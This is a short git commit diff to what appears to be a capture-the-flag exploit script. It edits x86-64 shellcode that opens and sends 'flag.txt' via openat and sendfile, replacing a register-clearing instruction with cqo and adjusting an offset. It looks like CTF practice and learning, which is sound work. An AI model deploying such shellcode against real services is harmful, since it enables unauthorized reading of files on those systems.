learnt about the cqo instruction that sign-extends rax into rdx

2024-10-23 14:14:56 +00:00
parent c9a6e41075
commit 8ba0d691c2
1 changed files with 3 additions and 3 deletions
@@ -26,9 +26,9 @@ r.sendlineafter(b": ", buf)

 # openat + sendfile
 shellcode="""
-lea rsi, [rdx+38]
+lea rsi, [rdx+37]
 mov edi, -100
-xor rdx, rdx
+cqo
 xor r10, r10
 add ax, 257
 syscall
@@ -43,4 +43,4 @@ shellcode = asm(shellcode)
 shellcode += b"flag.txt\0"
 r.sendlineafter(b": ", shellcode)

-r.interactive()
+r.interactive()